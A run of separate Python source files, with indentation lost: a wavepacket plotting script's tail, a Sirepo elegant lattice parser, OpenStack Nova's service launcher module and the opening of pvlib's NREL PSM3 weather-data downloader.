ax1.set_xlim(view[0],0)
ax1.set_ylim(view[2:4])
ax1.set_xlabel(r"$x \le 0$")
ax1.set_ylabel(r"$\langle\varphi |\varphi \rangle$")
# Plot the probability density, right to X0
ax2 = fig.add_subplot(1,2,2)
ax2.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
# mother
if have_mother_data is True:
plotcf(gr, angle(yr), conj(yr)*yr)
# spawned
if have_spawn_data is True:
plot(gr, conj(ysr)*ysr, "-r")
if view is not None:
ax2.set_xlim(0, view[1])
ax2.set_ylim(view[4:])
ax2.set_xlabel(r"$x > 0$")
ax2.set_ylabel(r"$\langle\varphi |\varphi \rangle$")
fig.suptitle(r"Time $"+str(step*parameters["dt"])+r"$")
fig.savefig("wavepackets_"+ (5-len(str(step)))*"0"+str(step) +GD.output_format)
close(fig)
print(" Plotting frames finished")
if __name__ == "__main__":
iom = IOManager()
# Read file with simulation data
try:
iom.open_file(filename=sys.argv[1])
except IndexError:
iom.open_file()
    # Enable the split axes view
split = True
if split is True:
# Where on the x axis to split the view
X0 = 0.0
# The axes rectangle that is plotted
view = [-15, 15, 0.0, 1.5, 0.0, 0.05]
plot_frames_split(iom, view=view, plotphase=True, plotcomponents=False, plotabssqr=False)
else:
# The axes rectangle that is plotted
view = [-8.5, 8.5, -0.1, 1.5]
plot_frames(iom, view=view, plotphase=True, plotcomponents=False, plotabssqr=False)
iom.finalize()
|
|
# -*- coding: utf-8 -*-
u"""elegant lattice parser
:copyright: Copyright (c) 2015 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkresource
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdc, pkdlog, pkdp
from sirepo import simulation_db
from sirepo.template import code_variable
from sirepo.template import elegant_common
from sirepo.template import elegant_lattice_parser
from sirepo.template import lattice
import math
import ntpath
import operator
import re
import sirepo.sim_data
import subprocess
_IGNORE_FIELD = [
'mpi_io_write_buffer_size',
'rootname',
'search_path',
'semaphore_file',
]
_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals('elegant')
_ELEGANT_TYPE_RE = re.compile(r'^[A-Z]+$')
_ELEGANT_TYPES = set(n for n in _SCHEMA.model if _ELEGANT_TYPE_RE.search(n))
def elegant_code_var(variables):
_PI = 4 * math.atan(1)
class _P(code_variable.PurePythonEval):
_OPS = PKDict({
'<': operator.lt,
'>': operator.gt,
'beta.p': lambda a: a / (math.sqrt((1 + (a * a)))),
'dacos': lambda a: math.acos(a) * 180 / _PI,
'dasin': lambda a: math.asin(a) * 180 / _PI,
'datan': lambda a: math.atan(a) * 180 / _PI,
'dcos': lambda a: math.cos(a * _PI / 180),
'dsin': lambda a: math.sin(a * _PI / 180),
'dtan': lambda a: math.tan(a * _PI / 180),
'gamma.beta': lambda a: 1 / math.sqrt(1 - (a * a)),
'gamma.p': lambda a: math.sqrt(1 + (a * a)),
# TODO(e-carlin): Should not need lambda.
# https://bugs.python.org/issue29299
'ln': lambda a: math.log(a),
'mod': operator.mod,
'mult': operator.mul,
'p.beta': lambda a: a / math.sqrt(1 - (a * a)),
'p.gamma': lambda a: math.sqrt((a * a) - 1),
'sqr': lambda a: a * a,
**code_variable.PurePythonEval._OPS
})
def eval_var(self, expr, depends, variables):
if re.match(r'^\{.+\}$', expr):
# It is a shell command
return expr, None
return super().eval_var(expr, depends, variables)
return code_variable.CodeVar(
variables,
_P(
constants=PKDict(
c_gs=2.99792458e10,
c_mks=2.99792458e8,
e_cgs=4.80325e-10,
e_mks=1.60217733e-19,
hbar_MeVs=6.582173e-22,
hbar_mks=1.0545887e-34,
kb_cgs=1.380658e-16,
kb_mks=1.380658e-23,
me_cgs=9.1093897e-28,
me_mks=9.1093897e-31,
mev=0.51099906,
mp_mks=1.6726485e-27,
pi=_PI,
re_cgs=2.81794092e-13,
re_mks=2.81794092e-15,
),
),
)
def import_file(text, data=None, update_filenames=True):
if not data:
data = simulation_db.default_data(elegant_common.SIM_TYPE)
models = elegant_lattice_parser.parse_file(
text,
data.models.rpnVariables,
lattice.LatticeUtil.max_id(data),
)
name_to_id, default_beamline_id = _create_name_map(models)
if 'default_beamline_name' in models and models['default_beamline_name'] in name_to_id:
default_beamline_id = name_to_id[models['default_beamline_name']]
element_names = PKDict()
rpn_cache = PKDict()
code_var = elegant_code_var(models.rpnVariables)
for el in models['elements']:
el['type'] = _validate_type(el, element_names)
element_names[el['name'].upper()] = el
validate_fields(el, rpn_cache, code_var, update_filenames)
for bl in models['beamlines']:
bl['items'] = _validate_beamline(bl, name_to_id, element_names)
if len(models['elements']) == 0 or len(models['beamlines']) == 0:
raise IOError('no beamline elements found in file')
data['models']['elements'] = models['elements']
data['models']['beamlines'] = models['beamlines']
data['models']['rpnVariables'] = models['rpnVariables']
lattice.LatticeUtil(data, _SCHEMA).sort_elements_and_beamlines()
if default_beamline_id:
data['models']['simulation']['activeBeamlineId'] = default_beamline_id
data['models']['simulation']['visualizationBeamlineId'] = default_beamline_id
# used by synergia app to get values for rpn expressions
data['models']['rpnCache'] = rpn_cache
return data
def validate_fields(el, rpn_cache, code_var=None, update_filenames=True):
if code_var is None:
code_var = elegant_code_var([])
for field in el.copy():
_validate_field(el, field, rpn_cache, code_var, update_filenames)
model_name = lattice.LatticeUtil.model_name_for_data(el)
for field in _SCHEMA['model'][model_name]:
if field not in el:
el[field] = _SCHEMA['model'][model_name][field][2]
def _create_name_map(models):
name_to_id = PKDict()
last_beamline_id = None
for bl in models['beamlines']:
name_to_id[bl['name'].upper()] = bl['id']
last_beamline_id = bl['id']
for el in models['elements']:
name_to_id[el['name'].upper()] = el['_id']
return name_to_id, last_beamline_id
def _field_type_for_field(el, field):
if re.search(r'\[\d+\]$', field):
field = re.sub(r'\[\d+\]$', '', field)
field_type = None
model_name = lattice.LatticeUtil.model_name_for_data(el)
for f in _SCHEMA['model'][model_name]:
if f == field:
field_type = _SCHEMA['model'][model_name][f][1]
break
if not field_type:
        if field not in _IGNORE_FIELD:
pkdlog('{}: unknown field type for {}', field, model_name)
del el[field]
return field_type
def _strip_file_prefix(value, model, field):
return re.sub(r'^{}-{}\.'.format(model, field), '', value)
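# e.g. _strip_file_prefix('WATCH-filename.run1.sdds', 'WATCH', 'filename')
# -> 'run1.sdds' (hypothetical value; the prefix format is '<model>-<field>.').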
def _validate_beamline(bl, name_to_id, element_names):
items = []
for name in bl['items']:
is_reversed = False
if re.search(r'^-', name):
is_reversed = True
name = re.sub(r'^-', '', name)
if name.upper() not in name_to_id:
raise IOError('{}: unknown beamline item name'.format(name))
id = name_to_id[name.upper()]
if name.upper() in element_names:
items.append(id)
else:
items.append(-id if is_reversed else id)
return items
def _validate_enum(el, field, field_type):
search = el[field].lower()
exact_match = ''
close_match = ''
for v in _SCHEMA['enum'][field_type]:
if v[0] == search:
exact_match = v[0]
break
if search.startswith(v[0]) or v[0].startswith(search):
close_match = v[0]
if exact_match:
el[field] = exact_match
elif close_match:
el[field] = close_match
else:
raise IOError('{} unknown value: "{}"'.format(field, search))
def _validate_field(el, field, rpn_cache, code_var, update_filenames):
if field in ['_id', '_type']:
return
if '_type' not in el and field == 'type':
return
field_type = _field_type_for_field(el, field)
if not field_type:
return
if update_filenames:
if field_type == 'OutputFile':
el[field] = '1'
elif field_type == 'InputFile':
el[field] = ntpath.basename(el[field])
if field_type == "InputFileXY":
_validate_input_file(el, field)
elif (field_type == 'RPNValue' or field_type == 'RPNBoolean') and \
code_var.is_var_value(el[field]):
_validate_rpn_field(el, field, rpn_cache, code_var)
elif field_type.endswith('StringArray'):
_validate_string_array_field(el, field)
elif field_type in _SCHEMA['enum']:
_validate_enum(el, field, field_type)
elif 'type' in el and el['type'] == 'SCRIPT' and field == 'command':
_validate_script(el)
# Input files may have been from a sirepo export. Strip the sirepo file prefix if present.
if field_type.startswith('InputFile'):
el[field] = _strip_file_prefix(
el[field], lattice.LatticeUtil.model_name_for_data(el), field)
elif field_type == 'BeamInputFile':
el[field] = ntpath.basename(el[field])
el[field] = _strip_file_prefix(el[field], 'bunchFile', 'sourceFile')
def _validate_input_file(el, field):
# <filename>=<x>+<y>
    fullname = ntpath.basename(el[field])
m = re.search(r'^(.*?)\=(.*?)\+(.*)$', fullname)
if m:
el[field] = m.group(1)
el[field + 'X'] = m.group(2)
el[field + 'Y'] = m.group(3)
else:
el[field] = fullname
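# e.g. a value of 'profile.sdds=t+p' (hypothetical) sets el[field] to
# 'profile.sdds', el[field + 'X'] to 't' and el[field + 'Y'] to 'p'.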
def _validate_rpn_field(el, field, rpn_cache, code_var):
if '_type' in el:
# command model
m = re.search(r'\((.*?)\)$', el[field])
if m:
el[field] = m.group(1)
m = re.search(r'\{\s*rpnl\s+(.*)\}$', el[field])
if m:
el[field] = m.group(1)
return
el[field] = re.sub(r'\s+', ' ', el[field]).strip()
value, error = code_var.eval_var(el[field])
if error:
raise IOError(f'invalid rpn="{el[field]}" error="{error}"')
rpn_cache[el[field]] = value
def _validate_script(el):
    # e.g., command: 'sddscombine %i beam1.sdds -merge %o'
v = el['command']
if v:
m = re.search(r'(\w+)\b', v, re.IGNORECASE)
if m:
executable = m.group(1)
try:
import distutils.spawn
if not distutils.spawn.find_executable(executable):
el['commandFile'] = executable
except Exception as e:
pass
m = re.search(r'\b(\w+\.sdds)\b', v, re.IGNORECASE)
if m:
el['commandInputFile'] = m.group(1)
def _validate_string_array_field(el, field):
m = re.search(r'(.*?)\[(\d+)\]$', field)
if not m:
return
value = el[field]
del el[field]
field = m.group(1)
index = int(m.group(2))
    if field not in el:
model_name = lattice.LatticeUtil.model_name_for_data(el)
el[field] = _SCHEMA['model'][model_name][field][2]
value_array = re.split(r'\s*,\s*', el[field])
m = re.search(r'^(\d+)\*(.*)$', value)
if m:
count = int(m.group(1))
val = m.group(2)
for i in range(count):
value_array[index + i] = val
else:
values = re.split(r'\s*,\s*', value)
for v in values:
value_array[index] = v
index += 1
el[field] = ', '.join(value_array)
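# e.g. a field 'ramp[2]' with value '3*1.0' (hypothetical) sets indices 2-4
# of the comma-separated default array to '1.0' before rejoining.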
def _validate_type(el, element_names):
type = el['type'].upper()
match = None
for el_type in _ELEGANT_TYPES:
if type.startswith(el_type) or el_type.startswith(type):
if match:
raise IOError('{}: type name matches multiple element types'.format(type))
match = el_type
if not match:
# type may refer to another element
        if el['type'].upper() in element_names:
el_copy = element_names[el['type'].upper()]
for field in el_copy.copy():
if field not in el:
el[field] = el_copy[field]
match = el_copy['type']
else:
raise IOError('{}: element not found'.format(type))
return match
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import errno
import inspect
import os
import random
import signal
import sys
import time
import eventlet
import greenlet
from oslo.config import cfg
from nova import conductor
from nova import context
from nova import exception
from nova.openstack.common import eventlet_backdoor
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import rpc
from nova import servicegroup
from nova import utils
from nova import version
from nova import wsgi
LOG = logging.getLogger(__name__)
service_opts = [
cfg.IntOpt('report_interval',
default=10,
help='seconds between nodes reporting state to datastore'),
cfg.BoolOpt('periodic_enable',
default=True,
help='enable periodic tasks'),
cfg.IntOpt('periodic_fuzzy_delay',
default=60,
help='range of seconds to randomly delay when starting the'
' periodic task scheduler to reduce stampeding.'
' (Disable by setting to 0)'),
cfg.ListOpt('enabled_apis',
default=['ec2', 'osapi_compute', 'metadata'],
help='a list of APIs to enable by default'),
cfg.ListOpt('enabled_ssl_apis',
default=[],
help='a list of APIs with enabled SSL'),
cfg.StrOpt('ec2_listen',
default="0.0.0.0",
help='IP address for EC2 API to listen'),
cfg.IntOpt('ec2_listen_port',
default=8773,
help='port for ec2 api to listen'),
cfg.IntOpt('ec2_workers',
default=None,
help='Number of workers for EC2 API service'),
cfg.StrOpt('osapi_compute_listen',
default="0.0.0.0",
help='IP address for OpenStack API to listen'),
cfg.IntOpt('osapi_compute_listen_port',
default=8774,
               help='listen port for osapi compute'),
cfg.IntOpt('osapi_compute_workers',
default=None,
help='Number of workers for OpenStack API service'),
cfg.StrOpt('metadata_manager',
default='nova.api.manager.MetadataManager',
help='OpenStack metadata service manager'),
cfg.StrOpt('metadata_listen',
default="0.0.0.0",
help='IP address for metadata api to listen'),
cfg.IntOpt('metadata_listen_port',
default=8775,
help='port for metadata api to listen'),
cfg.IntOpt('metadata_workers',
default=None,
help='Number of workers for metadata service'),
cfg.StrOpt('compute_manager',
default='nova.compute.manager.ComputeManager',
help='full class name for the Manager for compute'),
cfg.StrOpt('console_manager',
default='nova.console.manager.ConsoleProxyManager',
help='full class name for the Manager for console proxy'),
cfg.StrOpt('cert_manager',
default='nova.cert.manager.CertManager',
help='full class name for the Manager for cert'),
cfg.StrOpt('network_manager',
default='nova.network.manager.VlanManager',
help='full class name for the Manager for network'),
cfg.StrOpt('scheduler_manager',
default='nova.scheduler.manager.SchedulerManager',
help='full class name for the Manager for scheduler'),
cfg.IntOpt('service_down_time',
default=60,
help='maximum time since last check-in for up service'),
]
CONF = cfg.CONF
CONF.register_opts(service_opts)
CONF.import_opt('host', 'nova.netconf')
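# Illustrative nova.conf overrides for the options registered above
# (standard oslo.config syntax; values are examples only):
#
#     [DEFAULT]
#     report_interval = 30
#     periodic_fuzzy_delay = 0
#     enabled_apis = ec2,osapi_compute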
class SignalExit(SystemExit):
def __init__(self, signo, exccode=1):
super(SignalExit, self).__init__(exccode)
self.signo = signo
class Launcher(object):
"""Launch one or more services and wait for them to complete."""
def __init__(self):
"""Initialize the service launcher.
:returns: None
"""
self._services = []
self.backdoor_port = eventlet_backdoor.initialize_if_enabled()
@staticmethod
def run_server(server):
"""Start and wait for a server to finish.
:param service: Server to run and wait for.
:returns: None
"""
server.start()
server.wait()
def launch_server(self, server):
"""Load and start the given server.
:param server: The server you would like to start.
:returns: None
"""
if self.backdoor_port is not None:
server.backdoor_port = self.backdoor_port
gt = eventlet.spawn(self.run_server, server)
self._services.append(gt)
def stop(self):
"""Stop all services which are currently running.
:returns: None
"""
for service in self._services:
service.kill()
def wait(self):
"""Waits until all services have been stopped, and then returns.
:returns: None
"""
for service in self._services:
try:
service.wait()
except greenlet.GreenletExit:
pass
class ServiceLauncher(Launcher):
def _handle_signal(self, signo, frame):
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
raise SignalExit(signo)
def wait(self):
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
LOG.debug(_('Full set of CONF:'))
for flag in CONF:
flag_get = CONF.get(flag, None)
# hide flag contents from log if contains a password
# should use secret flag when switch over to openstack-common
if ("_password" in flag or "_key" in flag or
(flag == "sql_connection" and "mysql:" in flag_get)):
LOG.debug(_('%(flag)s : FLAG SET ') % locals())
else:
LOG.debug('%(flag)s : %(flag_get)s' % locals())
status = None
try:
super(ServiceLauncher, self).wait()
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
finally:
self.stop()
rpc.cleanup()
if status is not None:
sys.exit(status)
class ServerWrapper(object):
def __init__(self, server, workers):
self.server = server
self.workers = workers
self.children = set()
self.forktimes = []
class ProcessLauncher(object):
def __init__(self):
self.children = {}
self.sigcaught = None
self.running = True
rfd, self.writepipe = os.pipe()
self.readpipe = eventlet.greenio.GreenPipe(rfd, 'r')
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
def _handle_signal(self, signo, frame):
self.sigcaught = signo
self.running = False
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
def _pipe_watcher(self):
# This will block until the write end is closed when the parent
# dies unexpectedly
self.readpipe.read()
LOG.info(_('Parent process has died unexpectedly, exiting'))
sys.exit(1)
def _child_process(self, server):
# Setup child signal handlers differently
def _sigterm(*args):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
raise SignalExit(signal.SIGTERM)
signal.signal(signal.SIGTERM, _sigterm)
# Block SIGINT and let the parent send us a SIGTERM
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Reopen the eventlet hub to make sure we don't share an epoll
# fd with parent and/or siblings, which would be bad
eventlet.hubs.use_hub()
# Close write to ensure only parent has it open
os.close(self.writepipe)
# Create greenthread to watch for parent to close pipe
eventlet.spawn(self._pipe_watcher)
# Reseed random number generator
random.seed()
launcher = Launcher()
launcher.run_server(server)
def _start_child(self, wrap):
if len(wrap.forktimes) > wrap.workers:
# Limit ourselves to one process a second (over the period of
# number of workers * 1 second). This will allow workers to
            # start up quickly but ensure we don't keep respawning
            # children that die immediately.
if time.time() - wrap.forktimes[0] < wrap.workers:
LOG.info(_('Forking too fast, sleeping'))
time.sleep(1)
wrap.forktimes.pop(0)
wrap.forktimes.append(time.time())
pid = os.fork()
if pid == 0:
# NOTE(johannes): All exceptions are caught to ensure this
        # doesn't fall back into the loop that spawns children. It would
# be bad for a child to spawn more children.
status = 0
try:
self._child_process(wrap.server)
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
except BaseException:
LOG.exception(_('Unhandled exception'))
status = 2
finally:
wrap.server.stop()
os._exit(status)
LOG.info(_('Started child %d'), pid)
wrap.children.add(pid)
self.children[pid] = wrap
return pid
def launch_server(self, server, workers=1):
wrap = ServerWrapper(server, workers)
LOG.info(_('Starting %d workers'), wrap.workers)
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
def _wait_child(self):
try:
pid, status = os.wait()
except OSError as exc:
if exc.errno not in (errno.EINTR, errno.ECHILD):
raise
return None
if os.WIFSIGNALED(status):
sig = os.WTERMSIG(status)
LOG.info(_('Child %(pid)d killed by signal %(sig)d'), locals())
else:
code = os.WEXITSTATUS(status)
LOG.info(_('Child %(pid)d exited with status %(code)d'), locals())
if pid not in self.children:
LOG.warning(_('pid %d not in child list'), pid)
return None
wrap = self.children.pop(pid)
wrap.children.remove(pid)
return wrap
def wait(self):
"""Loop waiting on children to die and respawning as necessary."""
while self.running:
wrap = self._wait_child()
if not wrap:
continue
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
if self.sigcaught:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[self.sigcaught]
LOG.info(_('Caught %s, stopping children'), signame)
for pid in self.children:
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
# Wait for children to die
if self.children:
LOG.info(_('Waiting on %d children to exit'), len(self.children))
while self.children:
self._wait_child()
class Service(object):
"""Service object for binaries running on hosts.
A service takes a manager and enables rpc by listening to queues based
on topic. It also periodically runs tasks on the manager and reports
    its state to the database services table."""
def __init__(self, host, binary, topic, manager, report_interval=None,
periodic_enable=None, periodic_fuzzy_delay=None,
periodic_interval_max=None, db_allowed=True,
*args, **kwargs):
self.host = host
self.binary = binary
self.topic = topic
self.manager_class_name = manager
# NOTE(russellb) We want to make sure to create the servicegroup API
# instance early, before creating other things such as the manager,
# that will also create a servicegroup API instance. Internally, the
# servicegroup only allocates a single instance of the driver API and
# we want to make sure that our value of db_allowed is there when it
# gets created. For that to happen, this has to be the first instance
# of the servicegroup API.
self.servicegroup_api = servicegroup.API(db_allowed=db_allowed)
manager_class = importutils.import_class(self.manager_class_name)
self.manager = manager_class(host=self.host, *args, **kwargs)
self.report_interval = report_interval
self.periodic_enable = periodic_enable
self.periodic_fuzzy_delay = periodic_fuzzy_delay
self.periodic_interval_max = periodic_interval_max
self.saved_args, self.saved_kwargs = args, kwargs
self.timers = []
self.backdoor_port = None
self.conductor_api = conductor.API(use_local=db_allowed)
self.conductor_api.wait_until_ready(context.get_admin_context())
def start(self):
verstr = version.version_string_with_package()
LOG.audit(_('Starting %(topic)s node (version %(version)s)'),
{'topic': self.topic, 'version': verstr})
self.basic_config_check()
self.manager.init_host()
self.model_disconnected = False
ctxt = context.get_admin_context()
try:
self.service_ref = self.conductor_api.service_get_by_args(ctxt,
self.host, self.binary)
self.service_id = self.service_ref['id']
except exception.NotFound:
self.service_ref = self._create_service_ref(ctxt)
if self.backdoor_port is not None:
self.manager.backdoor_port = self.backdoor_port
self.conn = rpc.create_connection(new=True)
LOG.debug(_("Creating Consumer connection for Service %s") %
self.topic)
self.manager.pre_start_hook(rpc_connection=self.conn)
rpc_dispatcher = self.manager.create_rpc_dispatcher(self.backdoor_port)
# Share this same connection for these Consumers
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=False)
node_topic = '%s.%s' % (self.topic, self.host)
self.conn.create_consumer(node_topic, rpc_dispatcher, fanout=False)
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=True)
# Consume from all consumers in a thread
self.conn.consume_in_thread()
self.manager.post_start_hook()
LOG.debug(_("Join ServiceGroup membership for this service %s")
% self.topic)
# Add service to the ServiceGroup membership group.
pulse = self.servicegroup_api.join(self.host, self.topic, self)
if pulse:
self.timers.append(pulse)
if self.periodic_enable:
if self.periodic_fuzzy_delay:
initial_delay = random.randint(0, self.periodic_fuzzy_delay)
else:
initial_delay = None
periodic = loopingcall.DynamicLoopingCall(self.periodic_tasks)
periodic.start(initial_delay=initial_delay,
periodic_interval_max=self.periodic_interval_max)
self.timers.append(periodic)
def _create_service_ref(self, context):
svc_values = {
'host': self.host,
'binary': self.binary,
'topic': self.topic,
'report_count': 0
}
service = self.conductor_api.service_create(context, svc_values)
self.service_id = service['id']
return service
def __getattr__(self, key):
manager = self.__dict__.get('manager', None)
return getattr(manager, key)
@classmethod
def create(cls, host=None, binary=None, topic=None, manager=None,
report_interval=None, periodic_enable=None,
periodic_fuzzy_delay=None, periodic_interval_max=None,
db_allowed=True):
"""Instantiates class and passes back application object.
:param host: defaults to CONF.host
:param binary: defaults to basename of executable
        :param topic: defaults to the binary name with the 'nova-' prefix stripped
:param manager: defaults to CONF.<topic>_manager
:param report_interval: defaults to CONF.report_interval
:param periodic_enable: defaults to CONF.periodic_enable
:param periodic_fuzzy_delay: defaults to CONF.periodic_fuzzy_delay
:param periodic_interval_max: if set, the max time to wait between runs
"""
if not host:
host = CONF.host
if not binary:
binary = os.path.basename(inspect.stack()[-1][1])
if not topic:
topic = binary.rpartition('nova-')[2]
if not manager:
manager_cls = ('%s_manager' %
binary.rpartition('nova-')[2])
manager = CONF.get(manager_cls, None)
if report_interval is None:
report_interval = CONF.report_interval
if periodic_enable is None:
periodic_enable = CONF.periodic_enable
if periodic_fuzzy_delay is None:
periodic_fuzzy_delay = CONF.periodic_fuzzy_delay
service_obj = cls(host, binary, topic, manager,
report_interval=report_interval,
periodic_enable=periodic_enable,
periodic_fuzzy_delay=periodic_fuzzy_delay,
periodic_interval_max=periodic_interval_max,
db_allowed=db_allowed)
return service_obj
def kill(self):
"""Destroy the service object in the datastore."""
self.stop()
try:
self.conductor_api.service_destroy(context.get_admin_context(),
self.service_id)
except exception.NotFound:
LOG.warn(_('Service killed that has no database entry'))
def stop(self):
# Try to shut the connection down, but if we get any sort of
        # errors, go ahead and ignore them, as we're shutting down anyway
try:
self.conn.close()
except Exception:
pass
for x in self.timers:
try:
x.stop()
except Exception:
pass
self.timers = []
def wait(self):
for x in self.timers:
try:
x.wait()
except Exception:
pass
def periodic_tasks(self, raise_on_error=False):
"""Tasks to be run at a periodic interval."""
ctxt = context.get_admin_context()
return self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error)
def basic_config_check(self):
"""Perform basic config checks before starting processing."""
# Make sure the tempdir exists and is writable
try:
with utils.tempdir() as tmpdir:
pass
except Exception as e:
LOG.error(_('Temporary directory is invalid: %s'), e)
sys.exit(1)
class WSGIService(object):
"""Provides ability to launch API from a 'paste' configuration."""
def __init__(self, name, loader=None, use_ssl=False, max_url_len=None):
"""Initialize, but do not start the WSGI server.
:param name: The name of the WSGI server given to the loader.
:param loader: Loads the WSGI application using the given name.
:returns: None
"""
self.name = name
self.manager = self._get_manager()
self.loader = loader or wsgi.Loader()
self.app = self.loader.load_app(name)
self.host = getattr(CONF, '%s_listen' % name, "0.0.0.0")
self.port = getattr(CONF, '%s_listen_port' % name, 0)
self.workers = getattr(CONF, '%s_workers' % name, None)
self.use_ssl = use_ssl
self.server = wsgi.Server(name,
self.app,
host=self.host,
port=self.port,
use_ssl=self.use_ssl,
max_url_len=max_url_len)
# Pull back actual port used
self.port = self.server.port
self.backdoor_port = None
def _get_manager(self):
"""Initialize a Manager object appropriate for this service.
Use the service name to look up a Manager subclass from the
configuration and initialize an instance. If no class name
is configured, just return None.
:returns: a Manager instance, or None.
"""
fl = '%s_manager' % self.name
if fl not in CONF:
return None
manager_class_name = CONF.get(fl, None)
if not manager_class_name:
return None
manager_class = importutils.import_class(manager_class_name)
return manager_class()
def start(self):
"""Start serving this service using loaded configuration.
Also, retrieve updated port number in case '0' was passed in, which
indicates a random port should be used.
:returns: None
"""
if self.manager:
self.manager.init_host()
self.manager.pre_start_hook()
if self.backdoor_port is not None:
self.manager.backdoor_port = self.backdoor_port
self.server.start()
if self.manager:
self.manager.post_start_hook()
def stop(self):
"""Stop serving this API.
:returns: None
"""
self.server.stop()
def wait(self):
"""Wait for the service to stop serving this API.
:returns: None
"""
self.server.wait()
# NOTE(vish): the global launcher is to maintain the existing
# functionality of calling service.serve +
# service.wait
_launcher = None
def serve(server, workers=None):
global _launcher
if _launcher:
raise RuntimeError(_('serve() can only be called once'))
if workers:
_launcher = ProcessLauncher()
_launcher.launch_server(server, workers=workers)
else:
_launcher = ServiceLauncher()
_launcher.launch_server(server)
def wait():
_launcher.wait()
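# A minimal usage sketch (illustrative only; the binary and topic names are
# placeholders) of how a nova binary would tie these pieces together:
#
#     server = Service.create(binary='nova-compute', topic='compute')
#     serve(server)  # no workers given, so the ServiceLauncher is used
#     wait()         # block until the service exits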
|
|
"""
Get PSM3 TMY
see https://developer.nrel.gov/docs/solar/nsrdb/psm3_data_download/
"""
import io
import requests
import pandas as pd
from json import JSONDecodeError
NSRDB_API_BASE = "https://developer.nrel.gov"
PSM_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-download.csv"
TMY_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-tmy-download.csv"
PSM5MIN_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-5min-download.csv"
# 'relative_humidity', 'total_precipitable_water' are not available
ATTRIBUTES = (
'air_temperature', 'dew_point', 'dhi', 'dni', 'ghi', 'surface_albedo',
'surface_pressure', 'wind_direction', 'wind_speed')
PVLIB_PYTHON = 'pvlib python'
def get_psm3(latitude, longitude, api_key, email, names='tmy', interval=60,
attributes=ATTRIBUTES, leap_day=False, full_name=PVLIB_PYTHON,
affiliation=PVLIB_PYTHON, timeout=30):
"""
Retrieve NSRDB PSM3 timeseries weather data from the PSM3 API. The NSRDB
is described in [1]_ and the PSM3 API is described in [2]_, [3]_, and [4]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
latitude : float or int
in decimal degrees, between -90 and 90, north is positive
longitude : float or int
in decimal degrees, between -180 and 180, east is positive
api_key : str
NREL Developer Network API key
email : str
NREL API uses this to automatically communicate messages back
to the user only if necessary
names : str, default 'tmy'
        PSM3 API parameter specifying the year or TMY variant to download, see notes
below for options
interval : int, {60, 5, 15, 30}
interval size in minutes, must be 5, 15, 30 or 60. Only used for
single-year requests (i.e., it is ignored for tmy/tgy/tdy requests).
attributes : list of str, optional
meteorological fields to fetch. If not specified, defaults to
``pvlib.iotools.psm3.ATTRIBUTES``. See references [2]_, [3]_, and [4]_
for lists of available fields.
leap_day : boolean, default False
include leap day in the results. Only used for single-year requests
(i.e., it is ignored for tmy/tgy/tdy requests).
full_name : str, default 'pvlib python'
optional
affiliation : str, default 'pvlib python'
optional
timeout : int, default 30
time in seconds to wait for server response before timeout
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see
:func:`pvlib.iotools.parse_psm3` for fields
Raises
------
requests.HTTPError
if the request response status is not ok, then the ``'errors'`` field
from the JSON response or any error message in the content will be
raised as an exception, for example if the `api_key` was rejected or if
the coordinates were not found in the NSRDB
Notes
-----
The required NREL developer key, `api_key`, is available for free by
registering at the `NREL Developer Network <https://developer.nrel.gov/>`_.
.. warning:: The "DEMO_KEY" `api_key` is severely rate limited and may
result in rejected requests.
The PSM3 API `names` parameter must be a single value from one of these
lists:
+-----------+-------------------------------------------------------------+
| Category | Allowed values |
+===========+=============================================================+
| Year | 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, |
| | 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, |
| | 2018, 2019 |
+-----------+-------------------------------------------------------------+
